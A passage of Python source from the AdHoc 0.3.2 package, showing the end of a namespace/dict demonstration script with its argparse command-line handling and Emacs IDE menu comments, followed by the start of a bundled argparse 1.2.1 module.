da_checked.extend(('iterkeys', 'itervalues', 'iteritems', ))
da_checked.extend(('viewkeys', 'viewvalues', 'viewitems', ))
da_checked.extend(('has_key',))
da_check_init()
cp = ns.copy()
da_check_report('copy')
da_check_init()
ns.clear()
da_check_report('clear')
for attr in python2_dict_attrs:
if attr not in da_checked:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'unchecked', attr))
# |:here:|
def run(parameters, pass_opts): # ||:fnc:||
"""Application runner, when called as __main__."""
# (progn (forward-line 1) (snip-insert-mode "py.bf.sql.ws" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.bf.file.arg.loop" t) (insert "\n"))
class x(object): # ||:cls:||
def get_prop(name): # |:mth:|
return 'prop'
def set_prop(name, value): # |:mth:|
return
prop = property(get_prop)
#x().prop = 55
#delattr(x(), 'prop')
# show_dict_methods()
# check_dict_methods()
# exit(0)
# |:here:|
ns = NameSpace()
ns2 = NameSpace()
# |:sec:|
hl('Basic namespace features')
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.__class__',
ns.__class__.__name__))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'is..(ns, dict)',
isinstance(ns, dict)))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'is..(vars(ns), dict)',
isinstance(vars(ns), dict)))
check_namespace_features(0)
check_namespace_features(1)
check_namespace_features(2)
hl('Set attributes on two namespaces (each is separate!)') # |:sec:|
ns.test = 55
ns2.test2 = -5
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.test', ns.test))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns2.test2', ns2.test2))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns2)', vars(ns2)))
hl('Set attributes via vars()') # |:sec:|
vars(ns)['hello'] = True
vars(ns)['world'] = True
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
hl('Access to the namespace class object') # |:sec:|
prop = ns._property_
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns._property_', prop))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.__class__',
prop.__class__))
prop.new_attr = 'new_attr'
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.new_attr', prop.new_attr))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.__dict__', prop.__dict__))
hl('The namespaces are not affected') # |:sec:|
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns2)', vars(ns2)))
hl('Set special property __dict__') # |:sec:|
new_dict = {'new': 0, 'dict': 1}
ns.__dict__ = new_dict
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'new_dict', new_dict))
ns.test = 'needed for delattr test'
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.test', ns.test))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'new_dict', new_dict))
hl('Set special attribute __class__') # |:sec:|
try:
ns.__class__ = "can't do this"
except AttributeError:
(t, e, tb) = sys.exc_info()
import traceback
printe(''.join(traceback.format_tb(tb)), end='')
printe(sformat('{0}: {1}', t.__name__, e))
del(tb)
pass
hl('Delete `test` attribute') # |:sec:|
delattr(ns, 'test')
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
hl('Access non-existent attribute test') # |:sec:|
try:
ns.test
except AttributeError:
(t, e, tb) = sys.exc_info()
import traceback
printe(''.join(traceback.format_tb(tb)), end='')
printe(sformat('{0}: {1}', t.__name__, e))
del(tb)
pass
hl('Delete non-existent attribute test') # |:sec:|
try:
delattr(ns, 'test')
except AttributeError:
(t, e, tb) = sys.exc_info()
import traceback
printe(''.join(traceback.format_tb(tb)), end='')
printe(sformat('{0}: {1}', t.__name__, e))
del(tb)
pass
hl('Delete special attribute __dict__') # |:sec:|
try:
delattr(ns, '__dict__')
except AttributeError:
(t, e, tb) = sys.exc_info()
import traceback
printe(''.join(traceback.format_tb(tb)), end='')
printe(sformat('{0}: {1}', t.__name__, e))
del(tb)
pass
# |:here:|
pass
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
_quiet = False
_verbose = False
_debug = False
# (progn (forward-line 1) (snip-insert-mode "py.f.setdefaultencoding" t) (insert "\n"))
file_encoding_is_clean = True
def setdefaultencoding(encoding=None, quiet=False):
if file_encoding_is_clean:
return
if encoding is None:
encoding='utf-8'
try:
isinstance('', basestring)
if not hasattr(sys, '_setdefaultencoding'):
if not quiet:
printf('''\
Add this to /etc/python2.x/sitecustomize.py,
or put it in local sitecustomize.py and adjust PYTHONPATH=".:${PYTHONPATH}"::
try:
import sys
setattr(sys, '_setdefaultencoding', getattr(sys, 'setdefaultencoding'))
except AttributeError:
pass
Running with reload(sys) hack ...
''', file=sys.stderr)
reload(sys)
setattr(sys, '_setdefaultencoding',
getattr(sys, 'setdefaultencoding'))
sys._setdefaultencoding(encoding)
except NameError:
# python3 already has utf-8 default encoding ;-)
pass
def main(argv): # ||:fnc:||
global _quiet, _debug, _verbose
global RtAdHoc, AdHoc
_parameters = None
_pass_opts = []
try:
import argparse
except ImportError:
try:
import argparse_local as argparse
except ImportError:
printe('error: argparse missing. Try `easy_install argparse`.')
sys.exit(1)
parser = argparse.ArgumentParser(add_help=False)
# parser.add_argument('--sum', dest='accumulate', action='store_const',
# const=sum, default=max,
# help='sum the integers (default: find the max)')
# |:opt:| add options
parser.add_argument(
'-q', '--quiet', action='store_const', const=-2,
dest='debug', default=0, help='suppress warnings')
parser.add_argument(
'-v', '--verbose', action='store_const', const=-1,
dest='debug', default=0, help='verbose test output')
parser.add_argument(
'-d', '--debug', nargs='?', action='store', type=int, metavar='NUM',
default = 0, const = 1,
help='show debug information')
parser.add_argument(
'-t', '--test', action='store_true',
help='run doc tests')
class AdHocAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
map(lambda opt: setattr(namespace, opt, False),
('implode', 'explode', 'extract', 'template'))
setattr(namespace, option_string[2:], True)
setattr(namespace, 'adhoc_arg', values)
parser.add_argument(
'--implode', nargs=0, action=AdHocAction, default=False,
help='implode script with adhoc')
parser.add_argument(
'--explode', nargs='?', action=AdHocAction, type=str, metavar='DIR',
default=False, const='__adhoc__',
help='explode script with adhoc in directory DIR'
' (default: `__adhoc__`)')
parser.add_argument(
'--extract', nargs='?', action=AdHocAction, type=str, metavar='DIR',
default=False, const = '.',
help='extract files to directory DIR (default: `.`)')
parser.add_argument(
'--template', nargs='?', action=AdHocAction, type=str, metavar='NAME',
default=False, const = '-',
help='extract named template to standard output. default NAME is ``-``')
parser.add_argument(
'-h', '--help', action='store_true',
help="display this help message")
parser.add_argument(
'--ap-help', action='store_true',
help="internal help message")
parser.add_argument(
'args', nargs='*', metavar='arg',
#'args', nargs='+', metavar='arg',
#type=argparse.FileType('r'), default=sys.stdin,
help='a series of arguments')
#_parameters = parser.parse_args()
(_parameters, _pass_opts) = parser.parse_known_args(argv[1:])
# generate argparse help
if _parameters.ap_help:
parser.print_help()
return 0
# standard help
if _parameters.help:
sys.stdout.write(__doc__)
return 0
_debug = _parameters.debug
if _debug > 0:
_verbose = True
_quiet = False
elif _debug < 0:
_verbose = (_debug == -1)
_quiet = not(_verbose)
_debug = 0
_parameters.debug = _debug
_parameters.verbose = _verbose
_parameters.quiet = _quiet
if _debug:
cmd_line = argv
sys.stderr.write(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[\n",
((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# ')),
((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (15)),
':DBG:', 'cmd_line', cmd_line))
# at least use `quiet` to suppress the setdefaultencoding warning
setdefaultencoding(quiet=_quiet or _parameters.test)
# |:opt:| handle options
# adhoc: implode/explode/extract
adhoc_export = (_parameters.explode or _parameters.extract)
adhoc_op = (_parameters.implode or adhoc_export or _parameters.template)
if adhoc_op:
file_ = __file__
source = None
have_adhoc = 'AdHoc' in globals()
have_rt_adhoc = 'RtAdHoc' in globals()
# shall adhoc be imported
if _parameters.implode or not have_rt_adhoc:
# shall this file be compiled
adhoc_compile = not (have_rt_adhoc)
os_path = os.defpath
for pv in ('PATH', 'path'):
try:
os_path = os.environ[pv]
break
except KeyError:
pass
os_path = os_path.split(os.pathsep)
for path_dir in os_path:
if not path_dir:
continue
if path_dir not in sys.path:
sys.path.append(path_dir)
if not have_adhoc:
try:
import adhoc
AdHoc = adhoc.AdHoc
except ImportError:
adhoc_compile = False
try:
from rt_adhoc import RtAdHoc as Adhoc
except ImportError:
pass
else:
adhoc_compile = False
AdHoc = RtAdHoc
AdHoc.quiet = _quiet
AdHoc.verbose = _verbose
AdHoc.debug = _debug
AdHoc.include_path.append(os.path.dirname(file_))
if adhoc_compile:
ah = AdHoc()
source = ah.compileFile(file_)
else:
file_, source = AdHoc.std_source_param(file_)
# implode
if _parameters.implode:
# @:adhoc_enable:@
# if not _quiet:
# map(sys.stderr.write,
# ["warning: ", os.path.basename(file_),
# " already imploded!\n"])
# @:adhoc_enable:@
AdHoc.write_source('-', source)
# explode
elif _parameters.explode:
AdHoc.export_dir = _parameters.adhoc_arg
AdHoc.export(file_, source)
# extract
elif _parameters.extract:
AdHoc.extract_dir = _parameters.adhoc_arg
AdHoc.extract(file_, source)
# template
elif _parameters.template:
template_name = _parameters.adhoc_arg
if not template_name:
template_name = '-'
if template_name == 'list':
sys.stdout.write(
'\n'.join(AdHoc.template_table(file_, source)) + '\n')
else:
template = AdHoc.get_named_template(
template_name, file_, source)
AdHoc.write_source('-', template)
# restore for subsequent calls to main
if not have_adhoc:
del(AdHoc)
return 0
# run doc tests
if _parameters.test:
import doctest
doctest.testmod(verbose = _verbose)
return 0
# |:opt:| handle options
run(_parameters, _pass_opts)
if __name__ == "__main__":
#sys.argv.insert(1, '--debug') # |:debug:|
result = main(sys.argv)
sys.exit(result)
# |:here:|
# (progn (forward-line 1) (snip-insert-mode "py.t.ide" t) (insert "\n"))
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: CSCOPE ON
# . (cscope-minor-mode)
# :ide: CSCOPE OFF
# . (cscope-minor-mode (quote ( nil )))
# :ide: TAGS: forced update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k FORCED=1 tags"))
# :ide: TAGS: update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k tags"))
# :ide: +-#+
# . Utilities ()
# :ide: TOC: Generate TOC with py-toc.py
# . (progn (save-buffer) (compile (concat "py-toc.py ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: CMD: Fold region with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces -width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" nil nil nil t)
# :ide: CMD: Fold region and replace with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces --width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" t nil nil t)
# :ide: +-#+
# . Fold ()
# :ide: CMD: Remove 8 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: CMD: Remove 4 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: +-#+
# . Doctest ()
# :ide: LINT: Check 80 column width ignoring IDE Menus
# . (let ((args " | /srv/ftp/pub/check-80-col.sh -")) (compile (concat "sed 's,^\\(\\|. \\|.. \\|... \\)\\(:ide\\|[.] \\).*,,;s,^ *. (progn (forward-line.*,,' " (buffer-file-name) " " args " | sed 's,^-," (buffer-file-name) ",'")))
# :ide: LINT: Check 80 column width
# . (let ((args "")) (compile (concat "/srv/ftp/pub/check-80-col.sh " (buffer-file-name) " " args)))
# :ide: +-#+
# . Lint Tools ()
# :ide: DELIM: @: SYM :@ @:fillme:@ adhoc tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "@:") (cons ":@" nil)) t)
# :ide: +-#+
# . Delimiters ()
# :ide: COMPILE: Run with --ap-help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --ap-help")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --test --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test --verbose")))
# :ide: COMPILE: Run with --debug
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --debug")))
# :ide: +-#+
# . Compile with standard arguments ()
# :ide: OCCUR-OUTLINE: Python Source Code
# . (x-symbol-tag-occur-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: MENU-OUTLINE: Python Source Code
# . (x-eIDE-menu-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: +-#+
# . Outline ()
# :ide: INFO: SQLAlchemy - SQL Expression Language - Reference
# . (let ((ref-buffer "*sqa-expr-ref*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/reference/sqlalchemy/expressions.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - SQL Expression Language - Tutorial
# . (let ((ref-buffer "*sqa-expr-tutor*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/sqlexpression.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - Query
# . (let ((ref-buffer "*sqa-query*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/orm/query.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: +-#+
# . SQLAlchemy Reference ()
# :ide: INFO: Python - argparse
# . (let ((ref-buffer "*python-argparse*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://docs.python.org/library/argparse.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: Python Documentation
# . (let ((ref-buffer "*w3m*")) (if (get-buffer ref-buffer) (display-buffer ref-buffer t)) (other-window 1) (w3m-goto-url "http://docs.python.org/index.html" nil nil))
# :ide: INFO: Python Reference
# . (let* ((ref-buffer "*python-ref*") (local "/home/ws/project/ws-util/python/reference/PQR2.7.html") (url (or (and (file-exists-p local) local) "'http://rgruet.free.fr/PQR27/PQR2.7.html'"))) (unless (get-buffer ref-buffer) (get-buffer-create ref-buffer) (with-current-buffer ref-buffer (shell-command (concat "snc txt.py.reference 2>/dev/null") ref-buffer) (goto-char (point-min)) (if (eobp) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " " url) ref-buffer)))) (display-buffer ref-buffer t))
# :ide: +-#+
# . Python Reference ()
# @:adhoc_disable:@
# :ide: COMPILE: Run with --verbose --implode >namespace_dict_imploded.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --implode >namespace_dict_imploded.py")))
# @:adhoc_disable:@
# :ide: COMPILE: Run with --template list
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with python3 --test
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with python3 w/o args
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/namespace_dict.py | namespace_dict.py |
__version__ = '1.2.1'
__all__ = [
'ArgumentParser',
'ArgumentError',
'ArgumentTypeError',
'FileType',
'HelpFormatter',
'ArgumentDefaultsHelpFormatter',
'RawDescriptionHelpFormatter',
'RawTextHelpFormatter',
'Namespace',
'Action',
'ONE_OR_MORE',
'OPTIONAL',
'PARSER',
'REMAINDER',
'SUPPRESS',
'ZERO_OR_MORE',
]
import copy as _copy
import os as _os
import re as _re
import sys as _sys
import textwrap as _textwrap
from gettext import gettext as _
try:
set
except NameError:
# for python < 2.4 compatibility (sets module is there since 2.3):
from sets import Set as set
try:
basestring
except NameError:
basestring = str
try:
sorted
except NameError:
# for python < 2.4 compatibility:
def sorted(iterable, reverse=False):
result = list(iterable)
result.sort()
if reverse:
result.reverse()
return result
def _callable(obj):
return hasattr(obj, '__call__') or hasattr(obj, '__bases__')
SUPPRESS = '==SUPPRESS=='
OPTIONAL = '?'
ZERO_OR_MORE = '*'
ONE_OR_MORE = '+'
PARSER = 'A...'
REMAINDER = '...'
_UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args'
# =============================
# Utility functions and classes
# =============================
class _AttributeHolder(object):
"""Abstract base class that provides __repr__.
The __repr__ method returns a string in the format::
ClassName(attr=name, attr=name, ...)
The attributes are determined either by a class-level attribute,
'_kwarg_names', or by inspecting the instance __dict__.
"""
def __repr__(self):
type_name = type(self).__name__
arg_strings = []
for arg in self._get_args():
arg_strings.append(repr(arg))
for name, value in self._get_kwargs():
arg_strings.append('%s=%r' % (name, value))
return '%s(%s)' % (type_name, ', '.join(arg_strings))
def _get_kwargs(self):
return sorted(self.__dict__.items())
def _get_args(self):
return []
def _ensure_value(namespace, name, value):
if getattr(namespace, name, None) is None:
setattr(namespace, name, value)
return getattr(namespace, name)
# ===============
# Formatting Help
# ===============
class HelpFormatter(object):
"""Formatter for generating usage messages and argument help strings.
Only the name of this class is considered a public API. All the methods
provided by the class are considered an implementation detail.
"""
def __init__(self,
prog,
indent_increment=2,
max_help_position=24,
width=None):
# default setting for width
if width is None:
try:
width = int(_os.environ['COLUMNS'])
except (KeyError, ValueError):
width = 80
width -= 2
self._prog = prog
self._indent_increment = indent_increment
self._max_help_position = max_help_position
self._width = width
self._current_indent = 0
self._level = 0
self._action_max_length = 0
self._root_section = self._Section(self, None)
self._current_section = self._root_section
self._whitespace_matcher = _re.compile(r'\s+')
self._long_break_matcher = _re.compile(r'\n\n\n+')
# ===============================
# Section and indentation methods
# ===============================
def _indent(self):
self._current_indent += self._indent_increment
self._level += 1
def _dedent(self):
self._current_indent -= self._indent_increment
assert self._current_indent >= 0, 'Indent decreased below 0.'
self._level -= 1
class _Section(object):
def __init__(self, formatter, parent, heading=None):
self.formatter = formatter
self.parent = parent
self.heading = heading
self.items = []
def format_help(self):
# format the indented section
if self.parent is not None:
self.formatter._indent()
join = self.formatter._join_parts
for func, args in self.items:
func(*args)
item_help = join([func(*args) for func, args in self.items])
if self.parent is not None:
self.formatter._dedent()
# return nothing if the section was empty
if not item_help:
return ''
# add the heading if the section was non-empty
if self.heading is not SUPPRESS and self.heading is not None:
current_indent = self.formatter._current_indent
heading = '%*s%s:\n' % (current_indent, '', self.heading)
else:
heading = ''
# join the section-initial newline, the heading and the help
return join(['\n', heading, item_help, '\n'])
def _add_item(self, func, args):
self._current_section.items.append((func, args))
# ========================
# Message building methods
# ========================
def start_section(self, heading):
self._indent()
section = self._Section(self, self._current_section, heading)
self._add_item(section.format_help, [])
self._current_section = section
def end_section(self):
self._current_section = self._current_section.parent
self._dedent()
def add_text(self, text):
if text is not SUPPRESS and text is not None:
self._add_item(self._format_text, [text])
def add_usage(self, usage, actions, groups, prefix=None):
if usage is not SUPPRESS:
args = usage, actions, groups, prefix
self._add_item(self._format_usage, args)
def add_argument(self, action):
if action.help is not SUPPRESS:
# find all invocations
get_invocation = self._format_action_invocation
invocations = [get_invocation(action)]
for subaction in self._iter_indented_subactions(action):
invocations.append(get_invocation(subaction))
# update the maximum item length
invocation_length = max([len(s) for s in invocations])
action_length = invocation_length + self._current_indent
self._action_max_length = max(self._action_max_length,
action_length)
# add the item to the list
self._add_item(self._format_action, [action])
def add_arguments(self, actions):
for action in actions:
self.add_argument(action)
# =======================
# Help-formatting methods
# =======================
def format_help(self):
help = self._root_section.format_help()
if help:
help = self._long_break_matcher.sub('\n\n', help)
help = help.strip('\n') + '\n'
return help
def _join_parts(self, part_strings):
return ''.join([part
for part in part_strings
if part and part is not SUPPRESS])
def _format_usage(self, usage, actions, groups, prefix):
if prefix is None:
prefix = _('usage: ')
# if usage is specified, use that
if usage is not None:
usage = usage % dict(prog=self._prog)
# if no optionals or positionals are available, usage is just prog
elif usage is None and not actions:
usage = '%(prog)s' % dict(prog=self._prog)
# if optionals and positionals are available, calculate usage
elif usage is None:
prog = '%(prog)s' % dict(prog=self._prog)
# split optionals from positionals
optionals = []
positionals = []
for action in actions:
if action.option_strings:
optionals.append(action)
else:
positionals.append(action)
# build full usage string
format = self._format_actions_usage
action_usage = format(optionals + positionals, groups)
usage = ' '.join([s for s in [prog, action_usage] if s])
# wrap the usage parts if it's too long
text_width = self._width - self._current_indent
if len(prefix) + len(usage) > text_width:
# break usage into wrappable parts
part_regexp = r'\(.*?\)+|\[.*?\]+|\S+'
opt_usage = format(optionals, groups)
pos_usage = format(positionals, groups)
opt_parts = _re.findall(part_regexp, opt_usage)
pos_parts = _re.findall(part_regexp, pos_usage)
assert ' '.join(opt_parts) == opt_usage
assert ' '.join(pos_parts) == pos_usage
# helper for wrapping lines
def get_lines(parts, indent, prefix=None):
lines = []
line = []
if prefix is not None:
line_len = len(prefix) - 1
else:
line_len = len(indent) - 1
for part in parts:
if line_len + 1 + len(part) > text_width:
lines.append(indent + ' '.join(line))
line = []
line_len = len(indent) - 1
line.append(part)
line_len += len(part) + 1
if line:
lines.append(indent + ' '.join(line))
if prefix is not None:
lines[0] = lines[0][len(indent):]
return lines
# if prog is short, follow it with optionals or positionals
if len(prefix) + len(prog) <= 0.75 * text_width:
indent = ' ' * (len(prefix) + len(prog) + 1)
if opt_parts:
lines = get_lines([prog] + opt_parts, indent, prefix)
lines.extend(get_lines(pos_parts, indent))
elif pos_parts:
lines = get_lines([prog] + pos_parts, indent, prefix)
else:
lines = [prog]
# if prog is long, put it on its own line
else:
indent = ' ' * len(prefix)
parts = opt_parts + pos_parts
lines = get_lines(parts, indent)
if len(lines) > 1:
lines = []
lines.extend(get_lines(opt_parts, indent))
lines.extend(get_lines(pos_parts, indent))
lines = [prog] + lines
# join lines into usage
usage = '\n'.join(lines)
# prefix with 'usage:'
return '%s%s\n\n' % (prefix, usage)
def _format_actions_usage(self, actions, groups):
# find group indices and identify actions in groups
group_actions = set()
inserts = {}
for group in groups:
try:
start = actions.index(group._group_actions[0])
except ValueError:
continue
else:
end = start + len(group._group_actions)
if actions[start:end] == group._group_actions:
for action in group._group_actions:
group_actions.add(action)
if not group.required:
if start in inserts:
inserts[start] += ' ['
else:
inserts[start] = '['
inserts[end] = ']'
else:
if start in inserts:
inserts[start] += ' ('
else:
inserts[start] = '('
inserts[end] = ')'
for i in range(start + 1, end):
inserts[i] = '|'
# collect all actions format strings
parts = []
for i, action in enumerate(actions):
# suppressed arguments are marked with None
# remove | separators for suppressed arguments
if action.help is SUPPRESS:
parts.append(None)
if inserts.get(i) == '|':
inserts.pop(i)
elif inserts.get(i + 1) == '|':
inserts.pop(i + 1)
# produce all arg strings
elif not action.option_strings:
part = self._format_args(action, action.dest)
# if it's in a group, strip the outer []
if action in group_actions:
if part[0] == '[' and part[-1] == ']':
part = part[1:-1]
# add the action string to the list
parts.append(part)
# produce the first way to invoke the option in brackets
else:
option_string = action.option_strings[0]
# if the Optional doesn't take a value, format is:
# -s or --long
if action.nargs == 0:
part = '%s' % option_string
# if the Optional takes a value, format is:
# -s ARGS or --long ARGS
else:
default = action.dest.upper()
args_string = self._format_args(action, default)
part = '%s %s' % (option_string, args_string)
# make it look optional if it's not required or in a group
if not action.required and action not in group_actions:
part = '[%s]' % part
# add the action string to the list
parts.append(part)
# insert things at the necessary indices
for i in sorted(inserts, reverse=True):
parts[i:i] = [inserts[i]]
# join all the action items with spaces
text = ' '.join([item for item in parts if item is not None])
# clean up separators for mutually exclusive groups
open = r'[\[(]'
close = r'[\])]'
text = _re.sub(r'(%s) ' % open, r'\1', text)
text = _re.sub(r' (%s)' % close, r'\1', text)
text = _re.sub(r'%s *%s' % (open, close), r'', text)
text = _re.sub(r'\(([^|]*)\)', r'\1', text)
text = text.strip()
# return the text
return text
def _format_text(self, text):
if '%(prog)' in text:
text = text % dict(prog=self._prog)
text_width = self._width - self._current_indent
indent = ' ' * self._current_indent
return self._fill_text(text, text_width, indent) + '\n\n'
def _format_action(self, action):
# determine the required width and the entry label
help_position = min(self._action_max_length + 2,
self._max_help_position)
help_width = self._width - help_position
action_width = help_position - self._current_indent - 2
action_header = self._format_action_invocation(action)
# ho nelp; start on same line and add a final newline
if not action.help:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
# short action name; start on the same line and pad two spaces
elif len(action_header) <= action_width:
tup = self._current_indent, '', action_width, action_header
action_header = '%*s%-*s ' % tup
indent_first = 0
# long action name; start on the next line
else:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
indent_first = help_position
# collect the pieces of the action help
parts = [action_header]
# if there was help for the action, add lines of help text
if action.help:
help_text = self._expand_help(action)
help_lines = self._split_lines(help_text, help_width)
parts.append('%*s%s\n' % (indent_first, '', help_lines[0]))
for line in help_lines[1:]:
parts.append('%*s%s\n' % (help_position, '', line))
# or add a newline if the description doesn't end with one
elif not action_header.endswith('\n'):
parts.append('\n')
# if there are any sub-actions, add their help as well
for subaction in self._iter_indented_subactions(action):
parts.append(self._format_action(subaction))
# return a single string
return self._join_parts(parts)
def _format_action_invocation(self, action):
if not action.option_strings:
metavar, = self._metavar_formatter(action, action.dest)(1)
return metavar
else:
parts = []
# if the Optional doesn't take a value, format is:
# -s, --long
if action.nargs == 0:
parts.extend(action.option_strings)
# if the Optional takes a value, format is:
# -s ARGS, --long ARGS
else:
default = action.dest.upper()
args_string = self._format_args(action, default)
for option_string in action.option_strings:
parts.append('%s %s' % (option_string, args_string))
return ', '.join(parts)
def _metavar_formatter(self, action, default_metavar):
if action.metavar is not None:
result = action.metavar
elif action.choices is not None:
choice_strs = [str(choice) for choice in action.choices]
result = '{%s}' % ','.join(choice_strs)
else:
result = default_metavar
def format(tuple_size):
if isinstance(result, tuple):
return result
else:
return (result, ) * tuple_size
return format
def _format_args(self, action, default_metavar):
